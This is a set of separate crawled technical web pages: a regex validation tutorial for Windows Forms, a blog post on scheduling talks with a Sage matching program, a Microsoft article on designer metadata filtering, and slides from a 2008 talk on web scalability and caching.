I’ve been searching for a simple tutorial on using voice recognition in Android but haven’t had much luck. The official Google documentation provides an example of the activity, but doesn’t elaborate much beyond that, so you’re kind of on your own a little. Luckily I’ve gone through some of that pain, and should make this easy for you, post up a comment below if you think I can improve this.

I’d suggest that you create a blank project for this, get the basics, then think about merging VR into your existing applications. I’d also suggest that you copy the code below exactly as it appears, once you have that working you can begin to tweak it.

With your blank project set up, you should have an AndroidManifest file like the following

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.jameselsey">
    <application android:label="VoiceRecognitionDemo">
        <activity android:name=".VoiceRecognitionDemo"
                  android:label="VoiceRecognitionDemo">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>

And have the following in res/layout/voice_recog.xml :

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
              android:orientation="vertical"
              android:layout_width="fill_parent"
              android:layout_height="fill_parent">

    <TextView android:layout_width="fill_parent"
              android:layout_height="wrap_content"
              android:text="Click the button and start speaking" />

    <Button android:id="@+id/speakButton"
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:onClick="speakButtonClicked"
            android:text="Click me!" />

    <ListView android:id="@+id/list"
              android:layout_width="fill_parent"
              android:layout_height="wrap_content" />

</LinearLayout>

And finally, this in your res/layout/main.xml :

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
              android:orientation="vertical"
              android:layout_width="fill_parent"
              android:layout_height="fill_parent">

    <TextView android:layout_width="fill_parent"
              android:layout_height="wrap_content"
              android:text="Hello World" />

</LinearLayout>

So that's your layout and configuration sorted. It will provide us with a button to start the voice recognition, and a list to present any words which the voice recognition service thought it heard. Let's now step through the actual activity and see how this works. You should copy this into your activity :

package com.jameselsey;

import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.speech.RecognizerIntent;
import android.view.View;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.ListView;

import java.util.ArrayList;
import java.util.List;

/**
 * A very simple application to handle Voice Recognition intents
 * and display the results
 */
public class VoiceRecognitionDemo extends Activity
{
    private static final int REQUEST_CODE = 1234;
    private ListView wordsList;

    /**
     * Called when the activity is first created.
     */
    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.voice_recog);

        Button speakButton = (Button) findViewById(R.id.speakButton);
        wordsList = (ListView) findViewById(R.id.list);

        // Disable button if no recognition service is present
        PackageManager pm = getPackageManager();
        List<ResolveInfo> activities = pm.queryIntentActivities(
                new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH), 0);
        if (activities.size() == 0)
        {
            speakButton.setEnabled(false);
            speakButton.setText("Recognizer not present");
        }
    }

    /**
     * Handle the action of the button being clicked
     */
    public void speakButtonClicked(View v)
    {
        startVoiceRecognitionActivity();
    }

    /**
     * Fire an intent to start the voice recognition activity.
     */
    private void startVoiceRecognitionActivity()
    {
        Intent intent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH);
        intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL,
                RecognizerIntent.LANGUAGE_MODEL_FREE_FORM);
        intent.putExtra(RecognizerIntent.EXTRA_PROMPT, "Voice recognition Demo...");
        startActivityForResult(intent, REQUEST_CODE);
    }

    /**
     * Handle the results from the voice recognition activity.
     */
    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data)
    {
        if (requestCode == REQUEST_CODE && resultCode == RESULT_OK)
        {
            // Populate the wordsList with the String values the recognition engine thought it heard
            ArrayList<String> matches = data.getStringArrayListExtra(
                    RecognizerIntent.EXTRA_RESULTS);
            wordsList.setAdapter(new ArrayAdapter<String>(this,
                    android.R.layout.simple_list_item_1, matches));
        }
        super.onActivityResult(requestCode, resultCode, data);
    }
}

Breakdown of what the activity does :

Declares a request code, this is basically a checksum that we use to confirm the response when we call out to the voice recognition engine, this value could be anything you want. We also declare a ListView which will hold any words the recognition engine thought it heard.

The onCreate method does the usual initialisation when the activity is first created. This method also queries the packageManager to check if there are any packages installed that can handle intents for ACTION_RECOGNIZE_SPEECH. The reason we do this is to check we have a package installed that can do the translation, and if not we will disable the button.

The speakButtonClicked is bound to the button, so this method is invoked when the button is clicked. I wrote another tutorial on button binding so have a look at that if you don't understand this method.

The startVoiceRecognitionActivity invokes an activity that can handle the voice recognition, setting the language mode to free form (as opposed to web form).

The onActivityResult is the callback from the above invocation, it first checks to see that the request code matches the one that was passed in, and ensures that the result is OK and not an error. Next, the results are pulled out of the intent and set into the ListView to be displayed on the screen.

Notes on debugging :

You won't have a great deal of luck running this on the emulator, there may be ways of using a PC microphone to direct audio input into the emulator, but that doesn't sound like a trivial task. Your best bet is to generate the APK and transfer it over to your device (I'm running an Orange San Francisco / ZTE Blade). If you experience any crashing errors (I did), then connect your device via USB, enable debugging, and then run the following command from a console window

<android-home>/platform-tools/adb -d logcat

What this does, is invoke the android debug bridge, the -d switch specifies to run this against the physical device, and the logcat tells the ADB to print out any device logging to the console. This means anything you do on the device will be logged into your console window, it helped me find a few null pointer issues.

That's pretty much it, it's quite a simple activity. Have a play with it and if you have any comments please let me know. You may have mixed results with what the recognition thinks you have said, I've had some odd surprises, let me know!

Happy coding!

98 thoughts on “Android; How to implement voice recognition, a nice easy tutorial…”

Hi James! This is a brilliant tutorial, at least now I understand the code for speech recognition with android. However it shows “recognizer not present” when I run it. What can be the problem? I have a C# speech recognition application that works properly on the same machine. Is there a setting that I should make in order to enable the recognizer for android? Thank you Patrick

Hi Patrick, glad I've helped. When you say you have C# speech recognition, what do you mean by that? Something installed on your local PC?
Are you running this on the emulator or on a device? thanks Thanks for the quick response. I meant that I am able to use the Windows 7 Speech recogniser via a C# application. I was hoping that it will be the case with an android application using the emulator. But I just read that the SDK does not include the speech recognition and that it should work on a device, I don’t have a device yet. It there any thing that I can do to attach the speech recogniser to my SDK so that I can use it with my emulator? Thanks Hi James, Thanks for the very good tutorial. I don’t know if its possible to do without getting into unpublished methods within the RecognizerIntent, but I’m trying to run the VR in a service that is interval controlled, and most important DOES NOT SHOW A PROMPT. Do you have any suggestions or can you steer me to a resource that might help? Thanks Hi Dave, Thank you for the kind words, glad I’ve helped. So you want to start off VR from a service that is interval controlled, can I assume that by interval controlled you mean once every X number of seconds for example? Any reason why you specifically need a service for this and why you can’t stick with a basic activity? In regards to not showing a prompt, I’m not sure we have much control over that since its part of the droid SDK, but there may be a way of masking that out, I’ll do some digging. Cheers I guess I can use an Audio Sensor (do you know of a good tutorial, I got errors on Frank Ableson’s tutorial, still can’t get it to work) If there is no way to override the RecognizerIntent class I will have to write my own using the MediaRecorder, ugh. I Need to run as a persistent service for his app, it never completely stops and yes, I will be controlling the interval the VR runs, and stops. Interesting, well heres what I think.. Create a service to do the VR, then have your activity start/stop this based on a time interval. Inside the service you will need to fire off intents to the VR action. I’m not sure how you’ll keep the VR open for extended periods of time (since if it doesn’t hear anything after x number of seconds it will fail). To cover the default prompt you may have to show a view on top of it to mask it out (i.e., show a splash screen over it). I’d have to dabble in a bit more code to give any better advice :) Hey, I tried the code on a recent samsung powered with android but it says the same “recognizer not present”. How did you manage to get it working? Is there specific settings? Hi Patrick, this means that your handset doesn’t have an voice recognition engines. You can go onto the market place and download google Voice if you don’t already have it. My app makes use of VR engines, but it doesn’t provide one itself Hope this helps Hi James. When I try to run the app on the emulator but it says recognizer not present Hi Simphiwe, This means that you don’t have any voice recognition engines on your handset, go onto the marketplace and download Google Voice. My app makes use of VR engines, but it doesn’t provide one itself. Hope this helps hai, thank you for your tutorial. i am trying to run this code using my own database. i prepared my language and acoustic models for the arabic language but I do not know how to connect my database with this code. my application is samall it includes only 10 words(i say the number in arabic and it writes it down). the source i am using for the training is a jar file and it saves my results in zip files. Hi Amal, Interesting app you have there! What behaviour are you experiencing? 
I think you might have problems using Arabic, this is what the Google website says : So I think that possibly Arabic is not support yet. hi amal, I am trying to do the same thing…so did you successeded? I need help thanks Thanks for the tutorial. The tutorial on the android dev website din’t help much. Thanks Your tutorial was wonderful and worked like a charm, I have a question about VR. Is it possible to input 1 sound and receive another? For example : I input the phrase “I want to go to sleep” and the VR exports the phrase “then go lay down” or “it’s not your bedtime yet”. So i want to input one value/word and have the VR export another desired value. Is that possible? and if so can you point me in the right direction? You can absolutely do that! However there will be some difficulties along the way. How should the app know how to respond? Will you have a database of phrases, whereby if one is detected, it will know the mapping to the response? Or are you planning some form of Artificial Intelligence to do this? Also, the VR can be a little sketchy depending on accents and so forth, I tend to mumble a little bit and it often has trouble detecting what I’m saying. Interesting idea you have though, I’d like to hear how it goes :) Thanks for the speedy response! To answer your questions “How should the app know how to respond? Will you have a database of phrases, whereby if one is detected, it will know the mapping to the response? Or are you planning some form of Artificial Intelligence to do this?” … I don’t know yet. I was thinking of adding a database of catch words, whereas if input is “A” export is “Z”, but I don’t know how to set the Method to do that yet. I mean if i could just learn how to set the first method, i could figure the rest out. Or if i the format for manipulating the database was present, i would at least have a starting point. Any help? Thanks in advance. Sounds a bit fiddly, you could store phrases in a database, then when one is spoken you can obtain all the words and see how many of those match the set phrases you have, for example if 8 out of the 10 words match, you’d be pretty confident. Thats just one way of doing it. The technical side should be fairly easy, just reading/writing to a SQLite instance, the tricky part is working out the business logic of how you want it to work. Personally (without knowing any more about what your app does) I would store set phrases such as “Hello my name is ?” and then when it hears “Hello, my name is James”, it would recognise the words “Hello”, “my”, “name”, “is”, “James” and map them to a set response. The name James would be detected as a variable and used in the response “Nice to meet you James”. Good luck! So does that mean that I have to “build the database”, “modify a built in database” or direct the app to “a database”? Yeah, create yourself a database, a table, and populate it with some dummy data. Please checkout the SQLite tutorial I did, it covers pretty much all of the aforementioned. You can use an online database, or a local SQLite db, or even sync the two, its up to you and depends if you need offline modes. Hi James . In my case i have just copied the existing VoiceRecognitionDemo code you have given here and i am running the code through device but after clicking on button i am getting connect error .. just to mention Google voice search is installed on phone and running perfectly Please help Connect error? Sounds like you don’t have internet connection, which you would need for the VR to work. 
Couple of things, check your internet connectivity, make sure manifest has internet permissions. If that still doesn’t work, put your logs into pastebin.com and give me a link! :) yeah yes it worked that time only..i refered some blog where it was mentioned that we need to have nternet for google voice search as it has to connect google data server.. anyways thanks for quick reply That is true, everytime you speak into the app, it collects that audio data and sends it off to Google for them to do their “crunching” and then replies with the text, so you must have internet connectivity. Happy coding :) Hi James, I was just wondering how long does it take to recognize a word if it has to go to google servers 1st. how many bytes get send and received per word? Is there any way you can use this class without internet access? Hi Bennie, It depends really, it depends on how many words you are processing, for example if you are quoting 2 pages from a book it will take a bit longer! Also depends on your internet connection, if you have really slow connection the data transfer will obviously take longer. No idea about how many bytes, haven’t been concerned with that low level stuff. If you want to use the Google VR engine then you’ll need internet access, I don’t believe there is a way around that. However there may be other 3rd party VR engines that work in offline mode, I’m not too sure. Hope this helps Hey James, Thanks for the great tutorial! Unfortunately I get a “recognizer not present” message on my phone. (Also ZTE Blade) This is probably due to the fact that for some reason Google Voice is not supported in my country for some reason. (Israel) I wonder if I can somehow get another speech recognizer to work, maybe you know about another application? I’m a total Android noob btw. Thanks! hi James ,i am from India , thats why i’m unable to use Google voice &therefore i’m getting error”recognizer not present” Please suggest me some better option hi james,i am from india,am doing my academic project in one of MNC company.I want to impliment biometric application in android mobile phones.Through voice recognition my mobile should be unlocked, it shld be unlocked for my own voice.so can u suggest code releted to my project. hi james, Is it possible ot make this app work offline?? without google voice ? (with my own database) thanks Thank you very much for your effort. Could you please provide your Facebook account so that we can communicate with you? Best Regards, Mahmoud How i can run speech recognizer… though USB…. Give detail for me please….!!!!! Another real useful tut from u :) y james replay for my quari? y james no reply for my quari?? Hey! I would like to know if there is a way of not using the speech server (Voice search). The Voice dialler apparently use an engine which is on the phone. I have seen a couple of app that do too. Thanx Hello, brilliant tutorial! I get one error though :( “Can’t dispatch DDM chunk 52454151: no handler defined” I have tried everything to fix this! Any chance you can send me the .apk of yours so I can see what is different? Thank you in advance! Interesting, which version of the android SDK are you working to? Hi James,brilliant tutorial. I’m new to speech recognition and Android, and would like to know how is a database for a speech app created ( i.e. if you are creating your own db, say of 10 words only) and how is it connected to the app? hi James . it is possible to do that what you think in your mind it should want to be happen in the mobile? 
Hi James, brilliant tutorial indeed. I am new to Android and speech recognition and would like to know how is a database of a speech recognition app (i.e. an app working without google search or offline) built and how are the two(app & db) connected. do have any idea? please help Hi Chepe, I’m not too sure since it is not something I’ve investigate too much (offline TTS that is) however there is more than likely APIs out there which you can include in your app. App/DB interconnectivity will probably be via SQLite if local, or some kind of web service call if you have a centralised base on the web. Hope this helps :) Hi James, i’m trying to implement text to speech in our language. Can you give me the right method to produce the voice/sounds from database?? thanks in advance Hi, Which language are you wanting to use, Philipino? Chinese? Spanish? Thanks philipino… i’m from Philippine not UK.. Philipino…We want to know what are the processes in putting natural voices in android so that we can make text-to-speech in philipino.. we are trying to use Syllabification Algorithm..thanks.. Philipino. we are using syllable algorithm..and we have also problems in browsing and receiving text messages..i hope you will help us..thanks Hi James, Great tutorial :). Can I use this engine to recognize sounds of an object rather then words (for example hearing a car or hearing a keyboard pressed)? I want to identify the objects by the sound Or I have to develop my own engine that do so? Great Tutorial! I Was wondering if i could have the user say something and it would search a site in the provided webview of my app. Hi James , Nice Tutorial … Wondering if you can upload somewhere the the “apk” so that i can test it on my device before playing with the codes … Thanks , will be of great help if u can do so asap Jacobs hi ,we not have google voice service in our country . So there is another way to speech recognition on emulator? thank you .nice tutorial ..chennai ..india pls update with new android tech tutorials as well like phone gap why is it that if i say good morning even then it shows me a list good morning strings added with boarding govin body boring..so on listed.. is there a wayh to filter out and list out the exact words spoken out.. pleas reply for the same..thank u.. Hi james, thax for your tutorial ,its very useful for beginnig speech recognition.I ask you this:when I debug it activities (list parameter) size null ,so run if clause directly.This is a simple mistake about hardware or something ,I think.What about you? Thanks for this tutorial. But how to implement “RecognizerIntent.EXTRA_WEB_SEARCH_ONLY” in the onActivityResult method? Thanks in advance!!! hi james.. how can i add speech recognizer in my emulator ?????? i have no android phone……through emulator i am trying to download voice recognizer bt failed … i also used update sdk 3.2 bt failed ………plz help me……….i need a detail help. Hi Auvy, I’m not quite sure, as you would need some way of sending voice input into the emulator. There must be a way via the ADB, but I’m not entirely sure, you’ll have to Google for it. If all else fails, try asking on StackOverflow.com, its a great site for quick and detailed answers. Good luck! Hi James, Thanks for the tutorial. I have it almost working. First it wasn’t working at all, because I had no speech recognizer. So I installed voice search and now the button is visible. When I click on the button it starts. But then once I say anything the program crashes. 
I get the following error: “The application Voice Search (process com.google.android.voicesearch) has stopped unexpectedly. Please try again. – Force close. Any ideas as to what I should do? Kind Regards Aubrey. Ahh, Fixed it! This will answer the question for allot of people here who want to know how to get a “voice search” speech recognizer other than google voice. Just go to Android market and download an app called “Jeannie”. When you start the app it will say you need to download a speech recognizer. It gives you an option to install voice search for android 1.5 or android 2.1. Then your app works perfectly! Thanks again James. Aubrey. This tutorial has been helpful, thank you very much! Hello, I am get the recorded audio. Is there any one could help me for to change the recorded voice in to mechanical voice ,i.e robot, cat. Thanks in advance Mukund Hi, I setup the code in Eclipse with Android 2.2 SDK. But I get error in Activity file: R cannot be resolved to a variable.. sorry im a noob.. Thank you in advance. FlinxSYS You can regenerate the R.java file if you right click the project in eclipse, does that help? hi james thanks for the tutorial…I am doing a project on voice recognition i am new to android.My project is as follows as we say send msg to [recipient][message] it should send to the particular person i have mentioned in the same way to call, to listen to music, to view map,and to show directions through map can u please help me out while coding Hi Vijay, Interesting project you have going there, is it for university or just for fun? I’m not quite sure what you are trying to do, but it sounds as if you want to speak something and have it sent to someone. I’d suggest you have a read about voice recognition on android and cook up a few quick little apps to play around. If you get stuck with anything specific please let me know! just give me the overview of the project how to start hmmmm thank u so much james for ur quick response…i am just getting trained in android in a small institute…and just want to do my first project…i will send u the abstract of the project so that u can better understand….. Abstract for voice applications: Send text messages Say “send text to [recipient] [message]*” e.g. “send text to Vijay “I am busy call u around 9″ Listen to music Say “listen to [artist/song/album]” e.g. “listen to the kolaveri” Call contacts Say “call [contact name] [phone type]*” e.g. “call Vijay home” Send email Say “send email to [recipient] [subject]* [body]*” e.g. “send email to Vijay How’s life in India treating you? The weather’s beautiful here!” View a map Say “map of [address/city]” e.g. “map of New Delhi” Go to websites Say “go to [website] e.g. “go to Wikipedia” Write a note(Remainder) Say “note to self [message]” e.g. “note to self grocery list banana milk eggs pizza” Search Google Say “[your query]” e.g. “pictures of the golden gate bridge at sunset” OK so your app needs to sit there listening, then when it hears one of a preset list of commands, determine which one it is, then action it accordingly, conceptually quite easy. Best thing I can suggest, is to break this down and experiment with some code. Create a basic app that will listen for commands, then repeat them back to you. Next, create an app that will action the commands when you click a button. Finally, scrap both of them and start fresh, using the knowledge you have, and tie them both up together. 
Voice recognition is quite nice, but it can sometimes struggle with regional accents, so bear that in mind when developing, speak like an American :) HMMMMM THANK U JAMES WILL TRY IT Thanks for your help earlier. If I have recognizer close and open again for next command, why do i get 1st results, and not 2nd? Do I have to close recognizer to send 2nd results to be stored in results? or? Thank you in advance. FlinxSYS HI james how to read the contact names through voice i am unable to do that in my project its not taking a noun Hi James, I found your interesting tutorial when searching VR Android. I’m working on a project to bring VR to our learning platform. You know many young children are shy or can’t speak correctly even when they are 3 or 4? The idea is to design a game that can recognize the input from a child player. For example the child can say “bring me an apple”, and game character will do accordingly. Do you think it’s realistic to use the current Android open source? Do you provide programming service? Thanks Dan Sure, anything is possible if you invest enough effort. Really depends how clear the child speaks, if they mumble a little bit I’d imagine the VR engine may struggle to detect what they’re saying hello, i want to make a project speech recognition on andriod.. please sugess me from where i have to start…. and what type of software i need… Hi James. Thanks for this. I understand the difference between ACTION_WEB_SEARCH and ACTION_RECOGNIZE_SPEECH as explained in Android dev docs and your example here.. But I am wondering if you or anyone else has practical experience with getting qualitative differences in results using these 2 different language models. I’d like to use the voice recognition in a tutorial that uses voice to select from a finite set of button labels. stacked with this. I have combed the various forums over the net but can’t find the answer. I am using android 4.0.3. Also, will this googlevoice run in an emulator? thanks… stucked with this. I have already combed various forums over the net but can’t find the answer. I am using android 4.0.3. Also, will this googlevoice run in an emulator? thanks… Thank You for this brilliant tutorial. I have been coding for android for about 3 months and this tutorial can just help me to create a voice assistant to understand user commands!! Hi James, nice posting and will definitely try the tutorial u suggesting, btw can this tutorial be running in android 2.2 environment? Hi James, how can I contact you regarding an android application development? Hi James, Great tutorial. Simple to follow and great to get started with. I followed and it works fine but I’m working on an android project that requires to convert a mp3 record to text. Any idea how can I do this? Thanks June There is a message I have seen that always “voice recognizer not present” why ? what is the solution? That is because you have no VR present, download google voice from the market Hi Dude, I am trying to create a service which should always listen for any voice command(if not screen locked), I need your help in that…. Pls reply me as soon as possible…! A service class would probably handle that well, perhaps coupled with a widget would be nice :) hello, i just wanted to get the only word which i spoke , how to get that you app gives the list of all possible words reply ASAP THANK YOU hello,James. I’m magicFox. Have you know that Google service Voice recognition SDK or the jar file? 
I want to use the plug in the the application.If you have some idear,can you give me a email?mine:[email protected]:[email protected] Thank you very much! Hey! James, do you have any idea how can i make recognition forever in loop (without button clicking). Thank you! Sorry for bad english ( Hey james i currently working on a app that should detect a Beep and trigger an event in the database . Can you help me the code and sample code . I m thinking of using it as a service which will run in background and keeps waiting for the beep to occur and it will store the current time in the database . Can you please help out with this .I am new to android . My email-id [email protected] . Thank you hi james, no doubt it is a great tutorial.. but i like to know can we will do voice recognition without internet…. i will be very thankful to youy if you will provide me the code…for it…plz revert me… Hi James, I have a question. Do you know of a way to make the speech recognition listen for an extended period of time? Thanks It seems to be working but I got no results in the ListView. So I tried Google Search and it works fine. Please let me know what could be the problem. thanks for your tutorial!! im trying to build voice based media player for visually impaired people, could you please help by integrating the voice code with media player. hey james… thanks alot for a great tutorial… But I am trying to do some thing different by the help of this tutorial…… I am doing voice recognition but without internet or you say offline. please help me in doing this. As i have done wioth this code it takes help of google api. So please help me in this that I will search or call my words but without the help of google api…. if possible plz help me in doing this
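Several commenters above ask how to pull out just the single best match rather than displaying every candidate the engine returns. Assuming the matches list comes back ordered most-confident-first (which is how the platform documentation describes EXTRA_RESULTS), a minimal variation on the tutorial's onActivityResult would be:

@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data)
{
    if (requestCode == REQUEST_CODE && resultCode == RESULT_OK)
    {
        ArrayList<String> matches = data.getStringArrayListExtra(
                RecognizerIntent.EXTRA_RESULTS);
        if (matches != null && !matches.isEmpty())
        {
            // First entry is the engine's best guess; discard the alternatives
            wordsList.setAdapter(new ArrayAdapter<String>(this,
                    android.R.layout.simple_list_item_1,
                    new String[] { matches.get(0) }));
        }
    }
    super.onActivityResult(requestCode, resultCode, data);
}

You can also cap how many alternatives the engine returns in the first place by adding intent.putExtra(RecognizerIntent.EXTRA_MAX_RESULTS, 1) when firing the recognition intent.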
http://www.jameselsey.co.uk/blogs/techblog/android-how-to-implement-voice-recognition-a-nice-easy-tutorial/
CC-MAIN-2016-50
en
refinedweb
Although we all agree to use 'self' as the "me object" proxy, it's not a keyword, and we could use a different stand in, e.g.:

class Human (object):

    def __init__(me, name):
        me.name = name

    def __repr__(me):
        return 'Hi, my name is %s' % me.name

>>> import subgenius
>>> aguy = Human('Bob')
>>> aguy
Hi, my name is Bob

It occurs to me that I could test "me" in place of "self" as it's shorter, and as it might encourage a first person identification which I think needs to happen when tackling OO.

We explored earlier on this list the difference between CivBuilder 3rd person games, like SimCity and Civilization IV (many others), and 1st person shooters e.g. Quake and Doom. Of course many games give both 1st and 3rd, though we should distinguish between two kinds of 3rd: 3rd as in "I am that character (avatar, action figure or whatever, as in 'Alice')" vs. "I have some god's eye view" (incorporeal flyer, as in Google Earth and most of those WarCrafty type games, also Sims).

Likewise, I think when coming to think formally in terms of objects (vs. informally, which begins with the emergence of language), it helps to personally project a "self" into various household objects, houses themselves. Like in the movie 'Cars' we need to *become* a thing, then ask (in the first person): what are my behaviors/methods, what are my attributes/properties? It's a game of "who am I" (or "who I am") and is already a natural feature of childhood play (fantasy self projections).

I'm thinking the word 'self', at least in English, is too '3rd person' in some ways, and looking down on a lot of objects, each with a 'self', you have only a god's eye view. However, the grammar around 'me' is different -- there's only one of them (one first person), and therefore thinking "me" promotes a kind of first person introspective attitude. And we *want* that, as an option, when modeling in OO.

So I'd be accomplishing two things in this lesson (involving temporarily substituting "me" for "self" in some class definitions): (a) I'd be communicating the subtle teaching that 'self is not a keyword in Python' and (b) helping with the subliminal process of personally identifying with various objects, in order to become a better object-oriented programmer. At the end of the lesson, I'd reinforce the canonical accepted 'self' (i.e. the god's eye view) as the proper one, but hopefully students would have taken to heart the point of this lesson.

Note that I'm not proposing this as a "for kids only" type lesson plan experience. I've been brainstorming a lot about what a Computer Science for Liberal Arts Majors might look like (recent link below), and this whole idea of "point of view" is already standard fare in literature courses, as well as film theory. We can bridge to OO through this "pronouns" discussion.

Note about 2nd person: many multi-player Internet games, plus single-user games, do have a "we" concept, i.e. you're a part of a team with a shared objective, up against other players, or up against the computer, as the case may be.

Related topic: me.__dict__ is a good intro to the idea of a "personal namespace" in addition to basic Python -- a helpful notion in psychology and diplomacy, where world views may start far apart, but grow closer through growing familiarity with the others' operations. It's in the tradition of Leibniz to want to use some "machine language" as a basis for diplomacy (American Transcendentalism has echoes of that, e.g. in Fuller's 'cosmic computer' meme).
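To make that "personal namespace" point concrete at the prompt, continuing the Human example above (the 'nickname' binding is just my illustration, not part of the lesson proper):

>>> aguy.__dict__
{'name': 'Bob'}
>>> aguy.__dict__['nickname'] = 'Dobbs'   # each instance carries its own dict
>>> aguy.nickname
'Dobbs'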
Kirby Liberal Arts Compsci (except selling as Maths in this context):
https://mail.python.org/pipermail/edu-sig/2006-July/006750.html
CC-MAIN-2016-50
en
refinedweb
You can use this module with the following in your ~/.xmonad/xmonad.hs:

import XMonad.Layout.HintedTile

Then edit your layoutHook by adding the HintedTile layout:

myLayout = hintedTile Tall ||| hintedTile Wide ||| Full ||| etc..
  where
    hintedTile = HintedTile nmaster delta ratio TopLeft
    nmaster    = 1
    ratio      = 1/2
    delta      = 3/100

main = xmonad defaultConfig { layoutHook = myLayout }

Because both XMonad and XMonad.Layout.HintedTile define Tall, you need to disambiguate Tall. If you are replacing the built-in Tall with HintedTile, change import XMonad to import XMonad hiding (Tall).

For more detailed instructions on editing the layoutHook see: XMonad.Doc.Extending
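For instance, if you take that route, the top of xmonad.hs would start like this (a sketch showing only the disambiguation; the rest of the config is as above):

import XMonad hiding (Tall)
import XMonad.Layout.HintedTile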
http://hackage.haskell.org/package/xmonad-contrib-0.8.1/docs/XMonad-Layout-HintedTile.html
CC-MAIN-2016-50
en
refinedweb
Cry about... .NET / C# Troubleshooting

The type or namespace name 'some-name' does not exist in the namespace 'some-namespace' (C#)

Symptom:

When compiling a C# application the compiler generates the following error:

The type or namespace name 'some-name' does not exist in the namespace 'some-namespace' (are you missing an assembly reference?)

where 'some-name' is the name of a type or a namespace and 'some-namespace' is the name of a namespace. For example:

The type or namespace name 'UI' does not exist in the namespace 'System.Web' (are you missing an assembly reference?)

Possible Causes and Remedies:

- The most likely cause is a simple spelling mistake. For example:

using System.Webb;

will generate "The type or namespace name 'Webb' does not exist in the namespace 'System' (are you missing an assembly reference?)" but in this case it should be:

using System.Web;

- Otherwise, like the error says, you are probably missing an assembly reference. Each project (be it an application or a class library) contains references, which might be to other class libraries or to libraries which are provided as part of the .NET framework. So check the list of references for the project - these are shown in the Solution Explorer under "References" in the tree view (or for VB.Net they are shown on the "References" tab of the project properties). If the reference is not listed then add it. For example, if I have "using System.Web;" in my code then a reference to System.Web needs to be listed. It will be by default for web projects but will not be by default for class libraries. Simply right click the "References" title in Solution Explorer and select "Add reference..." (or for VB.Net click [Add...] when viewing the list of references in the project properties). When adding a reference the "Projects" tab contains (as you would expect) a list of projects in the solution, and the ".NET" tab contains all the projects available from the .NET framework or which have been added to the GAC. Unfortunately the contents of the ".NET" tab are not sorted alphabetically, which can make finding the necessary reference difficult. If you still cannot find the reference listed then an alternative approach is to browse for it. The following table lists the location of various namespaces: I expect to add to this table slowly over time.

- See also: The type or namespace name '<type-name>' could not be found (C#)

These notes are believed to be correct for C# for Visual Studio 2010.
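To see the second cause in isolation, here is a minimal repro sketch (the file and class names are made up for illustration). In a freshly created C# class library, which does not reference System.Web.dll by default, the using line below triggers exactly this error until the assembly reference is added via References, Add Reference..., .NET tab, System.Web:

// MyLibrary.cs - fails with "The type or namespace name 'UI' does not exist
// in the namespace 'System.Web'" until a reference to System.Web is added
using System.Web.UI;

namespace MyLibrary
{
    public class PageHelper
    {
        // Page comes from System.Web.UI, so this type only resolves
        // once the assembly reference is in place
        public static string TitleOf(Page page)
        {
            return page.Title;
        }
    }
}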
http://www.cryer.co.uk/brian/mswinswdev/ms_csharp_type_or_namespace_does_not_exist_in_the_namespace.htm
CC-MAIN-2016-50
en
refinedweb
I'm trying to hide tab headers in the tabControl, like it's shown here in this link, but I am getting an error in the designer's code. Once I change both lines, I get this:

Severity: Message. The designer cannot process unknown name 'SelectedIndex' at line 43. The code within the method 'InitializeComponent' is generated by the designer and should not be manually modified. Please remove any changes and try opening the designer again. c:\users\krzysztof\documents\visual studio 2015\Projects\DaneUzytkownika3\DaneUzytkownika3\TabController.Designer.cs, line 44.

Severity: Error CS1061. 'TabController' does not contain a definition for 'SelectedIndex' and no extension method 'SelectedIndex' accepting a first argument of type 'TabController' could be found (are you missing a using directive or an assembly reference?) DaneUzytkownika3, c:\users\krzysztof\documents\visual studio 2015\Projects\DaneUzytkownika3\DaneUzytkownika3\TabController.Designer.cs, line 43.

Line 43 in the designer's code of the form is:

this.tabControl1.SelectedIndex = 0;

Could someone please tell me, how do I fix it?

namespace hiding
{
    class TablessTabControl : Form1
    {
        protected override void WndProc(ref Message m)
        {
            // Hide tabs by trapping the TCM_ADJUSTRECT message
            if (m.Msg == 0x1328 && !DesignMode)
                m.Result = (IntPtr)1;
            else
                base.WndProc(ref m);
        }
    }
}

Form1.Designer.cs

namespace hiding
{
    partial class Form1
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private

I have created a project and implemented the tab control as given in your example as follows:

class TablessTabControl : TabControl
{
    protected override void WndProc(ref Message m)
    {
        // Hide tabs by trapping the TCM_ADJUSTRECT message
        if (m.Msg == 0x1328 && !DesignMode)
            m.Result = (IntPtr)1;
        else
            base.WndProc(ref m);
    }
}

Then upon rebuilding the project I add my new TablessTabControl to a test form using the designer. Within the designer, I can switch between the tabs using the visible headers. At runtime, the headers disappear as intended. I have two tabs; I am able to select between the tabs by using the following code:

// Selects the first tab:
tablessTabControl1.SelectedIndex = 0;

// Selects the second tab:
tablessTabControl1.SelectedIndex = 1;

Additionally, in Form1.Designer.cs, I have line 48 as follows:

this.tablessTabControl1.SelectedIndex = 0;

which poses no difficulty for me. Have you tried closing all documents, cleaning the solution, rebuilding and reopening the designer?
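Since the usual reason for hiding the headers is wizard-style navigation, here is a small sketch of how the headerless control might be driven from Next/Back buttons (the button names are hypothetical, not from the question):

// Hypothetical Next/Back handlers stepping through the headerless tabs:
private void nextButton_Click(object sender, EventArgs e)
{
    if (tablessTabControl1.SelectedIndex < tablessTabControl1.TabCount - 1)
        tablessTabControl1.SelectedIndex++;
}

private void backButton_Click(object sender, EventArgs e)
{
    if (tablessTabControl1.SelectedIndex > 0)
        tablessTabControl1.SelectedIndex--;
}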
http://www.devsplanet.com/question/35278227
CC-MAIN-2016-50
en
refinedweb
The changes made to CppUnit are:

